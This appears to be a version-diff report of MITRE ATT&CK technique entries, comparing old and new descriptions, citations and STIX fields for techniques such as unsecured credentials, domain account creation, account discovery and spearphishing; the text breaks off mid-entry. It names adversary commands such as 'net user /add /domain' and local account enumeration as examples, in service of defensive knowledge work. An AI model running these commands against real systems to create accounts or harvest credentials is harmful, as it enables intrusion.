descriptionAdversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords. It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003). (Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller. (Citation: SRD GPP) In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)Adversaries may search local file systems and remote file shares for files containing insecurely stored credentials. These can be files created by users to store their own credentials, shared credential stores for a group of individuals, configuration files containing passwords for a system or service, or source code/binary files containing embedded passwords. It is possible to extract passwords from backups or saved virtual machines through [OS Credential Dumping](https://attack.mitre.org/techniques/T1003).(Citation: CG 2014) Passwords may also be obtained from Group Policy Preferences stored on the Windows Domain Controller.(Citation: SRD GPP) In cloud and/or containerized environments, authenticated user and service account credentials are often stored in local configuration and credential files.(Citation: Unit 42 Hildegard Malware) They may also be found as parameters to deployment commands in container logs.(Citation: Unit 42 Unsecured Docker Daemons) In some cases, these files can be copied and reused on another machine or the contents can be read and then used to authenticate without needing to copy any files.(Citation: Specter Ops - Cloud Credential Storage)
x_mitre_attack_spec_version3.1.03.2.0

[T1565] Data Manipulation

Current version: 1.1


Old Description
New Description
t1Adversaries may insert, delete, or manipulate data in order t1Adversaries may insert, delete, or manipulate data in order 
>to influence external outcomes or hide activity, thus threat>to influence external outcomes or hide activity, thus threat
>ening the integrity of the data. By manipulating data, adver>ening the integrity of the data.(Citation: Sygnia Elephant B
>saries may attempt to affect a business process, organizatio>eetle Jan 2022) By manipulating data, adversaries may attemp
>nal understanding, or decision making.  The type of modifica>t to affect a business process, organizational understanding
>tion and the impact it will have depends on the target appli>, or decision making.  The type of modification and the impa
>cation and process as well as the goals and objectives of th>ct it will have depends on the target application and proces
>e adversary. For complex systems, an adversary would likely >s as well as the goals and objectives of the adversary. For 
>need special expertise and possibly access to specialized so>complex systems, an adversary would likely need special expe
>ftware related to the system that would typically be gained >rtise and possibly access to specialized software related to
>through a prolonged information gathering campaign in order > the system that would typically be gained through a prolong
>to have the desired impact.>ed information gathering campaign in order to have the desir
 >ed impact.
Details
values_changed
STIX FieldOld valueNew Value
modified2022-04-19 23:03:02.016000+00:002024-02-02 17:18:39.004000+00:00
descriptionAdversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data.(Citation: Sygnia Elephant Beetle Jan 2022) By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making. The type of modification and the impact it will have depends on the target application and process as well as the goals and objectives of the adversary. For complex systems, an adversary would likely need special expertise and possibly access to specialized software related to the system that would typically be gained through a prolonged information gathering campaign in order to have the desired impact.
x_mitre_attack_spec_version2.1.03.2.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Sygnia Elephant Beetle Jan 2022', 'description': 'Sygnia Incident Response Team. (2022, January 5). TG2003: ELEPHANT BEETLE UNCOVERING AN ORGANIZED FINANCIAL-THEFT OPERATION. Retrieved February 9, 2023.', 'url': 'https://f.hubspotusercontent30.net/hubfs/8776530/Sygnia-%20Elephant%20Beetle_Jan2022.pdf?__hstc=147695848.3e8f1a482c8f8d4531507747318e660b.1680005306711.1680005306711.1680005306711.1&__hssc=147695848.1.1680005306711&__hsfp=3000179024&hsCtaTracking=189ec409-ae2d-4909-8bf1-62dcdd694372%7Cca91d317-8f10-4a38-9f80-367f551ad64d'}

[T1001] Data Obfuscation

Current version: 1.1


Old Description
New Description
t1Adversaries may obfuscate command and control traffic to makt1Adversaries may obfuscate command and control traffic to mak
>e it more difficult to detect. Command and control (C2) comm>e it more difficult to detect.(Citation: Bitdefender FunnyDr
>unications are hidden (but not necessarily encrypted) in an >eam Campaign November 2020) Command and control (C2) communi
>attempt to make the content more difficult to discover or de>cations are hidden (but not necessarily encrypted) in an att
>cipher and to make the communication less conspicuous and hi>empt to make the content more difficult to discover or decip
>de commands from being seen. This encompasses many methods, >her and to make the communication less conspicuous and hide 
>such as adding junk data to protocol traffic, using steganog>commands from being seen. This encompasses many methods, suc
>raphy, or impersonating legitimate protocols. >h as adding junk data to protocol traffic, using steganograp
 >hy, or impersonating legitimate protocols. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-15 00:40:27.670000+00:002024-02-02 19:04:35.389000+00:00
descriptionAdversaries may obfuscate command and control traffic to make it more difficult to detect. Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols. Adversaries may obfuscate command and control traffic to make it more difficult to detect.(Citation: Bitdefender FunnyDream Campaign November 2020) Command and control (C2) communications are hidden (but not necessarily encrypted) in an attempt to make the content more difficult to discover or decipher and to make the communication less conspicuous and hide commands from being seen. This encompasses many methods, such as adding junk data to protocol traffic, using steganography, or impersonating legitimate protocols.
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Bitdefender FunnyDream Campaign November 2020', 'description': 'Vrabie, V. (2020, November). Dissecting a Chinese APT Targeting South Eastern Asian Government Institutions. Retrieved September 19, 2022.', 'url': 'https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf'}

[T1562.008] Impair Defenses: Disable or Modify Cloud Logs

Current version: 2.0

Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-15 10:47:17.305000+00:002024-04-12 21:13:56.431000+00:00

[T1562.001] Impair Defenses: Disable or Modify Tools

Current version: 1.5

Details
values_changed
STIX FieldOld valueNew Value
modified2023-05-28 16:57:27.185000+00:002024-04-12 21:13:46.640000+00:00
x_mitre_attack_spec_version3.1.03.2.0

[T1136.002] Create Account: Domain Account

Current version: 1.1


Old Description
New Description
t1Adversaries may create a domain account to maintain access tt1Adversaries may create a domain account to maintain access t
>o victim systems. Domain accounts are those managed by Activ>o victim systems. Domain accounts are those managed by Activ
>e Directory Domain Services where access and permissions are>e Directory Domain Services where access and permissions are
> configured across systems and services that are part of tha> configured across systems and services that are part of tha
>t domain. Domain accounts can cover user, administrator, and>t domain. Domain accounts can cover user, administrator, and
> service accounts. With a sufficient level of access, the <c> service accounts. With a sufficient level of access, the <c
>ode>net user /add /domain</code> command can be used to crea>ode>net user /add /domain</code> command can be used to crea
>te a domain account.  Such accounts may be used to establish>te a domain account.(Citation: Savill 1999)  Such accounts m
> secondary credentialed access that do not require persisten>ay be used to establish secondary credentialed access that d
>t remote access tools to be deployed on the system.>o not require persistent remote access tools to be deployed 
 >on the system.
Details
values_changed
STIX FieldOld valueNew Value
modified2023-10-16 17:36:37.600000+00:002024-02-01 04:37:36.774000+00:00
descriptionAdversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account. Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.Adversaries may create a domain account to maintain access to victim systems. Domain accounts are those managed by Active Directory Domain Services where access and permissions are configured across systems and services that are part of that domain. Domain accounts can cover user, administrator, and service accounts. With a sufficient level of access, the net user /add /domain command can be used to create a domain account.(Citation: Savill 1999) Such accounts may be used to establish secondary credentialed access that do not require persistent remote access tools to be deployed on the system.
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Savill 1999', 'description': 'Savill, J. (1999, March 4). Net.exe reference. Retrieved September 22, 2015.', 'url': 'https://web.archive.org/web/20150511162820/http://windowsitpro.com/windows/netexe-reference'}

[T1087.002] Account Discovery: Domain Account

Current version: 1.2


Old Description
New Description
t1Adversaries may attempt to get a listing of domain accounts.t1Adversaries may attempt to get a listing of domain accounts.
> This information can help adversaries determine which domai> This information can help adversaries determine which domai
>n accounts exist to aid in follow-on behavior such as target>n accounts exist to aid in follow-on behavior such as target
>ing specific accounts which possess particular privileges.  >ing specific accounts which possess particular privileges.  
>Commands such as <code>net user /domain</code> and <code>net>Commands such as <code>net user /domain</code> and <code>net
> group /domain</code> of the [Net](https://attack.mitre.org/> group /domain</code> of the [Net](https://attack.mitre.org/
>software/S0039) utility, <code>dscacheutil -q group</code>on>software/S0039) utility, <code>dscacheutil -q group</code>on
> macOS, and <code>ldapsearch</code> on Linux can list domain> macOS, and <code>ldapsearch</code> on Linux can list domain
> users and groups. [PowerShell](https://attack.mitre.org/tec> users and groups. [PowerShell](https://attack.mitre.org/tec
>hniques/T1059/001) cmdlets including <code>Get-ADUser</code>>hniques/T1059/001) cmdlets including <code>Get-ADUser</code>
> and <code>Get-ADGroupMember</code> may enumerate members of> and <code>Get-ADGroupMember</code> may enumerate members of
> Active Directory groups.  > Active Directory groups.(Citation: CrowdStrike StellarParti
 >cle January 2022)  
Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-15 16:37:59.115000+00:002024-04-15 21:33:57.732000+00:00
descriptionAdversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges. Commands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including Get-ADUser and Get-ADGroupMember may enumerate members of Active Directory groups. Adversaries may attempt to get a listing of domain accounts. This information can help adversaries determine which domain accounts exist to aid in follow-on behavior such as targeting specific accounts which possess particular privileges. Commands such as net user /domain and net group /domain of the [Net](https://attack.mitre.org/software/S0039) utility, dscacheutil -q groupon macOS, and ldapsearch on Linux can list domain users and groups. [PowerShell](https://attack.mitre.org/techniques/T1059/001) cmdlets including Get-ADUser and Get-ADGroupMember may enumerate members of Active Directory groups.(Citation: CrowdStrike StellarParticle January 2022)
x_mitre_attack_spec_version3.1.03.2.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'CrowdStrike StellarParticle January 2022', 'description': 'CrowdStrike. (2022, January 27). Early Bird Catches the Wormhole: Observations from the StellarParticle Campaign. Retrieved February 7, 2022.', 'url': 'https://www.crowdstrike.com/blog/observations-from-the-stellarparticle-campaign/'}

[T1615] Group Policy Discovery

Current version: 1.1


Old Description
New Description
t1Adversaries may gather information on Group Policy settings t1Adversaries may gather information on Group Policy settings 
>to identify paths for privilege escalation, security measure>to identify paths for privilege escalation, security measure
>s applied within a domain, and to discover patterns in domai>s applied within a domain, and to discover patterns in domai
>n objects that can be manipulated or used to blend in the en>n objects that can be manipulated or used to blend in the en
>vironment. Group Policy allows for centralized management of>vironment. Group Policy allows for centralized management of
> user and computer settings in Active Directory (AD). Group > user and computer settings in Active Directory (AD). Group 
>policy objects (GPOs) are containers for group policy settin>policy objects (GPOs) are containers for group policy settin
>gs made up of files stored within a predictable network path>gs made up of files stored within a predictable network path
> `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Gr> `\<DOMAIN>\SYSVOL\<DOMAIN>\Policies\`.(Citation: TechNet Gr
>oup Policy Basics)(Citation: ADSecurity GPO Persistence 2016>oup Policy Basics)(Citation: ADSecurity GPO Persistence 2016
>)  Adversaries may use commands such as <code>gpresult</code>)  Adversaries may use commands such as <code>gpresult</code
>> or various publicly available PowerShell functions, such a>> or various publicly available PowerShell functions, such a
>s <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGro>s <code>Get-DomainGPO</code> and <code>Get-DomainGPOLocalGro
>up</code>, to gather information on Group Policy settings.(C>up</code>, to gather information on Group Policy settings.(C
>itation: Microsoft gpresult)(Citation: Github PowerShell Emp>itation: Microsoft gpresult)(Citation: Github PowerShell Emp
>ire) Adversaries may use this information to shape follow-on>ire) Adversaries may use this information to shape follow-on
> behaviors, including determining potential attack paths wit> behaviors, including determining potential attack paths wit
>hin the target network as well as opportunities to manipulat>hin the target network as well as opportunities to manipulat
>e Group Policy settings (i.e. [Domain Policy Modification](h>e Group Policy settings (i.e. [Domain or Tenant Policy Modif
>ttps://attack.mitre.org/techniques/T1484)) for their benefit>ication](https://attack.mitre.org/techniques/T1484)) for the
>.>ir benefit.
Details
values_changed
STIX FieldOld valueNew Value
descriptionAdversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\SYSVOL\\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Adversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.Adversaries may gather information on Group Policy settings to identify paths for privilege escalation, security measures applied within a domain, and to discover patterns in domain objects that can be manipulated or used to blend in the environment. Group Policy allows for centralized management of user and computer settings in Active Directory (AD). Group policy objects (GPOs) are containers for group policy settings made up of files stored within a predictable network path `\\SYSVOL\\Policies\`.(Citation: TechNet Group Policy Basics)(Citation: ADSecurity GPO Persistence 2016) Adversaries may use commands such as gpresult or various publicly available PowerShell functions, such as Get-DomainGPO and Get-DomainGPOLocalGroup, to gather information on Group Policy settings.(Citation: Microsoft gpresult)(Citation: Github PowerShell Empire) Adversaries may use this information to shape follow-on behaviors, including determining potential attack paths within the target network as well as opportunities to manipulate Group Policy settings (i.e. [Domain or Tenant Policy Modification](https://attack.mitre.org/techniques/T1484)) for their benefit.

[T1574] Hijack Execution Flow

Current version: 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2022-05-05 04:07:01.191000+00:002023-11-21 20:02:33.404000+00:00
x_mitre_attack_spec_version2.1.03.2.0

[T1553.004] Subvert Trust Controls: Install Root Certificate

Current version: 1.2

Details
values_changed
STIX FieldOld valueNew Value
modified2023-09-15 17:26:02.203000+00:002024-01-04 20:01:27.662000+00:00
external_references[5]['description']Sancho, D., Hacquebord, F., Link, R. (2014, July 22). Finding Holes Operation Emmental. Retrieved February 9, 2016.botconf eu. (2014, December 31). David Sancho - Finding Holes in Banking 2FA: Operation Emmental. Retrieved January 4, 2024.
external_references[5]['url']http://www.trendmicro.com/cloud-content/us/pdfs/security-intelligence/white-papers/wp-finding-holes-operation-emmental.pdfhttps://www.youtube.com/watch?v=gchKFumYHWc
x_mitre_attack_spec_version3.1.03.2.0

[T1001.001] Data Obfuscation: Junk Data

Current version: 1.0


Old Description
New Description
t1Adversaries may add junk data to protocols used for command t1Adversaries may add junk data to protocols used for command 
>and control to make detection more difficult. By adding rand>and control to make detection more difficult.(Citation: Fire
>om or meaningless data to the protocols used for command and>Eye SUNBURST Backdoor December 2020) By adding random or mea
> control, adversaries can prevent trivial methods for decodi>ningless data to the protocols used for command and control,
>ng, deciphering, or otherwise analyzing the traffic. Example> adversaries can prevent trivial methods for decoding, decip
>s may include appending/prepending data with junk characters>hering, or otherwise analyzing the traffic. Examples may inc
> or writing junk characters between significant characters. >lude appending/prepending data with junk characters or writi
 >ng junk characters between significant characters. 
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
values_changed
STIX FieldOld valueNew Value
modified2020-03-15 00:30:25.444000+00:002024-02-02 20:10:01.862000+00:00
descriptionAdversaries may add junk data to protocols used for command and control to make detection more difficult. By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters. Adversaries may add junk data to protocols used for command and control to make detection more difficult.(Citation: FireEye SUNBURST Backdoor December 2020) By adding random or meaningless data to the protocols used for command and control, adversaries can prevent trivial methods for decoding, deciphering, or otherwise analyzing the traffic. Examples may include appending/prepending data with junk characters or writing junk characters between significant characters.
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'FireEye SUNBURST Backdoor December 2020', 'description': 'FireEye. (2020, December 13). Highly Evasive Attacker Leverages SolarWinds Supply Chain to Compromise Multiple Global Victims With SUNBURST Backdoor. Retrieved January 4, 2021.', 'url': 'https://www.fireeye.com/blog/threat-research/2020/12/evasive-attacker-leverages-solarwinds-supply-chain-compromises-with-sunburst-backdoor.html'}

[T1087.001] Account Discovery: Local Account

Current version: 1.4


Old Description
New Description
t1Adversaries may attempt to get a listing of local system acct1Adversaries may attempt to get a listing of local system acc
>ounts. This information can help adversaries determine which>ounts. This information can help adversaries determine which
> local accounts exist on a system to aid in follow-on behavi> local accounts exist on a system to aid in follow-on behavi
>or.  Commands such as <code>net user</code> and <code>net lo>or.  Commands such as <code>net user</code> and <code>net lo
>calgroup</code> of the [Net](https://attack.mitre.org/softwa>calgroup</code> of the [Net](https://attack.mitre.org/softwa
>re/S0039) utility and <code>id</code> and <code>groups</code>re/S0039) utility and <code>id</code> and <code>groups</code
>>on macOS and Linux can list local users and groups. On Linu>> on macOS and Linux can list local users and groups.(Citati
>x, local users can also be enumerated through the use of the>on: Mandiant APT1)(Citation: id man page)(Citation: groups m
> <code>/etc/passwd</code> file. On macOS the <code>dscl . li>an page) On Linux, local users can also be enumerated throug
>st /Users</code> command can be used to enumerate local acco>h the use of the <code>/etc/passwd</code> file. On macOS the
>unts.> <code>dscl . list /Users</code> command can be used to enum
 >erate local accounts.
Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-13 17:20:22.867000+00:002024-01-11 23:47:44.655000+00:00
descriptionAdversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. Commands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groupson macOS and Linux can list local users and groups. On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts.Adversaries may attempt to get a listing of local system accounts. This information can help adversaries determine which local accounts exist on a system to aid in follow-on behavior. Commands such as net user and net localgroup of the [Net](https://attack.mitre.org/software/S0039) utility and id and groups on macOS and Linux can list local users and groups.(Citation: Mandiant APT1)(Citation: id man page)(Citation: groups man page) On Linux, local users can also be enumerated through the use of the /etc/passwd file. On macOS the dscl . list /Users command can be used to enumerate local accounts.
x_mitre_attack_spec_version3.1.03.2.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'id man page', 'description': 'MacKenzie, D. and Robbins, A. (n.d.). id(1) - Linux man page. Retrieved January 11, 2024.', 'url': 'https://linux.die.net/man/1/id'}
external_references{'source_name': 'groups man page', 'description': 'MacKenzie, D. and Youngman, J. (n.d.). groups(1) - Linux man page. Retrieved January 11, 2024.', 'url': 'https://linux.die.net/man/1/groups'}
external_references{'source_name': 'Mandiant APT1', 'description': 'Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.', 'url': 'https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf'}

[T1134.003] Access Token Manipulation: Make and Impersonate Token

Current version: 1.1


Old Description
New Description
t1Adversaries may make new tokens and impersonate users to esct1Adversaries may make new tokens and impersonate users to esc
>alate privileges and bypass access controls. For example, if>alate privileges and bypass access controls. For example, if
> an adversary has a username and password but the user is no> an adversary has a username and password but the user is no
>t logged onto the system the adversary can then create a log>t logged onto the system the adversary can then create a log
>on session for the user using the `LogonUser` function. The >on session for the user using the `LogonUser` function.(Cita
>function will return a copy of the new session's access toke>tion: LogonUserW function) The function will return a copy o
>n and the adversary can use `SetThreadToken` to assign the t>f the new session's access token and the adversary can use `
>oken to a thread.  This behavior is distinct from [Token Imp>SetThreadToken` to assign the token to a thread.  This behav
>ersonation/Theft](https://attack.mitre.org/techniques/T1134/>ior is distinct from [Token Impersonation/Theft](https://att
>001) in that this refers to creating a new user token instea>ack.mitre.org/techniques/T1134/001) in that this refers to c
>d of stealing or duplicating an existing one.>reating a new user token instead of stealing or duplicating 
 >an existing one.
Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-11 21:22:17.257000+00:002024-01-10 17:55:46.905000+00:00
descriptionAdversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function. The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread. This behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.Adversaries may make new tokens and impersonate users to escalate privileges and bypass access controls. For example, if an adversary has a username and password but the user is not logged onto the system the adversary can then create a logon session for the user using the `LogonUser` function.(Citation: LogonUserW function) The function will return a copy of the new session's access token and the adversary can use `SetThreadToken` to assign the token to a thread. This behavior is distinct from [Token Impersonation/Theft](https://attack.mitre.org/techniques/T1134/001) in that this refers to creating a new user token instead of stealing or duplicating an existing one.
x_mitre_attack_spec_version3.1.03.2.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'LogonUserW function', 'description': 'Microsoft. (2023, March 10). LogonUserW function (winbase.h). Retrieved January 8, 2024.', 'url': 'https://learn.microsoft.com/en-us/windows/win32/api/winbase/nf-winbase-logonuserw'}

[T1059.006] Command and Scripting Interpreter: Python

Current version: 1.0


Old Description
New Description
t1Adversaries may abuse Python commands and scripts for executt1Adversaries may abuse Python commands and scripts for execut
>ion. Python is a very popular scripting/programming language>ion. Python is a very popular scripting/programming language
>, with capabilities to perform many functions. Python can be>, with capabilities to perform many functions. Python can be
> executed interactively from the command-line (via the <code> executed interactively from the command-line (via the <code
>>python.exe</code> interpreter) or via scripts (.py) that ca>>python.exe</code> interpreter) or via scripts (.py) that ca
>n be written and distributed to different systems. Python co>n be written and distributed to different systems. Python co
>de can also be compiled into binary executables.  Python com>de can also be compiled into binary executables.(Citation: Z
>es with many built-in packages to interact with the underlyi>scaler APT31 Covid-19 October 2020)  Python comes with many 
>ng system, such as file operations and device I/O. Adversari>built-in packages to interact with the underlying system, su
>es can use these libraries to download and execute commands >ch as file operations and device I/O. Adversaries can use th
>or other scripts as well as perform various malicious behavi>ese libraries to download and execute commands or other scri
>ors.>pts as well as perform various malicious behaviors.
Details
dictionary_item_added
STIX FieldOld valueNew Value
x_mitre_attack_spec_version3.2.0
x_mitre_deprecatedFalse
x_mitre_remote_supportFalse
dictionary_item_removed
STIX FieldOld valueNew Value
x_mitre_permissions_required['Administrator', 'SYSTEM', 'root']
values_changed
STIX FieldOld valueNew Value
modified2021-07-26 22:49:23.094000+00:002024-01-30 18:35:58.021000+00:00
descriptionAdversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables. Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.Adversaries may abuse Python commands and scripts for execution. Python is a very popular scripting/programming language, with capabilities to perform many functions. Python can be executed interactively from the command-line (via the python.exe interpreter) or via scripts (.py) that can be written and distributed to different systems. Python code can also be compiled into binary executables.(Citation: Zscaler APT31 Covid-19 October 2020) Python comes with many built-in packages to interact with the underlying system, such as file operations and device I/O. Adversaries can use these libraries to download and execute commands or other scripts as well as perform various malicious behaviors.
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'Zscaler APT31 Covid-19 October 2020', 'description': 'Singh, S. and Antil, S. (2020, October 27). APT-31 Leverages COVID-19 Vaccine Theme and Abuses Legitimate Online Services. Retrieved March 24, 2021.', 'url': 'https://www.zscaler.com/blogs/security-research/apt-31-leverages-covid-19-vaccine-theme-and-abuses-legitimate-online'}

[T1584.004] Compromise Infrastructure: Server

Current version: 1.2


Old Description
New Description
t1Adversaries may compromise third-party servers that can be ut1Adversaries may compromise third-party servers that can be u
>sed during targeting. Use of servers allows an adversary to >sed during targeting. Use of servers allows an adversary to 
>stage, launch, and execute an operation. During post-comprom>stage, launch, and execute an operation. During post-comprom
>ise activity, adversaries may utilize servers for various ta>ise activity, adversaries may utilize servers for various ta
>sks, including for Command and Control. Instead of purchasin>sks, including for Command and Control.(Citation: TrendMicro
>g a [Server](https://attack.mitre.org/techniques/T1583/004) > EarthLusca 2022) Instead of purchasing a [Server](https://a
>or [Virtual Private Server](https://attack.mitre.org/techniq>ttack.mitre.org/techniques/T1583/004) or [Virtual Private Se
>ues/T1583/003), adversaries may compromise third-party serve>rver](https://attack.mitre.org/techniques/T1583/003), advers
>rs in support of operations.  Adversaries may also compromis>aries may compromise third-party servers in support of opera
>e web servers to support watering hole operations, as in [Dr>tions.  Adversaries may also compromise web servers to suppo
>ive-by Compromise](https://attack.mitre.org/techniques/T1189>rt watering hole operations, as in [Drive-by Compromise](htt
>), or email servers to support [Phishing](https://attack.mit>ps://attack.mitre.org/techniques/T1189), or email servers to
>re.org/techniques/T1566) operations.> support [Phishing](https://attack.mitre.org/techniques/T156
 >6) operations.
Details
values_changed
STIX FieldOld valueNew Value
modified2023-04-13 00:00:25.676000+00:002024-01-31 20:05:44.075000+00:00
descriptionAdversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control. Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations. Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.Adversaries may compromise third-party servers that can be used during targeting. Use of servers allows an adversary to stage, launch, and execute an operation. During post-compromise activity, adversaries may utilize servers for various tasks, including for Command and Control.(Citation: TrendMicro EarthLusca 2022) Instead of purchasing a [Server](https://attack.mitre.org/techniques/T1583/004) or [Virtual Private Server](https://attack.mitre.org/techniques/T1583/003), adversaries may compromise third-party servers in support of operations. Adversaries may also compromise web servers to support watering hole operations, as in [Drive-by Compromise](https://attack.mitre.org/techniques/T1189), or email servers to support [Phishing](https://attack.mitre.org/techniques/T1566) operations.
x_mitre_attack_spec_version3.1.03.2.0
iterable_item_added
STIX FieldOld valueNew Value
external_references{'source_name': 'TrendMicro EarthLusca 2022', 'description': 'Chen, J., et al. (2022). Delving Deep: An Analysis of Earth Lusca’s Operations. Retrieved July 1, 2022.', 'url': 'https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/a/earth-lusca-employs-sophisticated-infrastructure-varied-tools-and-techniques/technical-brief-delving-deep-an-analysis-of-earth-lusca-operations.pdf'}

[T1648] Serverless Execution

Current version: 1.0

Details
values_changed
STIX FieldOld valueNew Value
modified2022-10-24 15:21:55.001000+00:002024-03-05 16:13:38.643000+00:00
x_mitre_attack_spec_version2.1.03.2.0
iterable_item_added
STIX FieldOld valueNew Value
x_mitre_contributorsVectra AI

[T1566.001] Phishing: Spearphishing Attachment

Current version: 2.2


Old Description
New Description
t1Adversaries may send spearphishing emails with a malicious at1Adversaries may send spearphishing emails with a malicious a
>ttachment in an attempt to gain access to victim systems. Sp>ttachment in an attempt to gain access to victim systems. Sp
>earphishing attachment is a specific variant of spearphishin>earphishing attachment is a specific variant of spearphishin
>g. Spearphishing attachment is different from other forms of>g. Spearphishing attachment is different from other forms of
> spearphishing in that it employs the use of malware attache> spearphishing in that it employs the use of malware attache
>d to an email. All forms of spearphishing are electronically>d to an email. All forms of spearphishing are electronically
> delivered social engineering targeted at a specific individ> delivered social engineering targeted at a specific individ
>ual, company, or industry. In this scenario, adversaries att>ual, company, or industry. In this scenario, adversaries att
>ach a file to the spearphishing email and usually rely upon >ach a file to the spearphishing email and usually rely upon 
>[User Execution](https://attack.mitre.org/techniques/T1204) >[User Execution](https://attack.mitre.org/techniques/T1204) 
>to gain execution. Spearphishing may also involve social eng>to gain execution.(Citation: Unit 42 DarkHydrus July 2018) S
>ineering techniques, such as posing as a trusted source.  Th>pearphishing may also involve social engineering techniques,
>ere are many options for the attachment such as Microsoft Of> such as posing as a trusted source.  There are many options
>fice documents, executables, PDFs, or archived files. Upon o> for the attachment such as Microsoft Office documents, exec
>pening the attachment (and potentially clicking past protect>utables, PDFs, or archived files. Upon opening the attachmen
>ions), the adversary's payload exploits a vulnerability or d>t (and potentially clicking past protections), the adversary
>irectly executes on the user's system. The text of the spear>'s payload exploits a vulnerability or directly executes on 
>phishing email usually tries to give a plausible reason why >the user's system. The text of the spearphishing email usual
>the file should be opened, and may explain how to bypass sys>ly tries to give a plausible reason why the file should be o
>tem protections in order to do so. The email may also contai>pened, and may explain how to bypass system protections in o
>n instructions on how to decrypt an attachment, such as a zi>rder to do so. The email may also contain instructions on ho
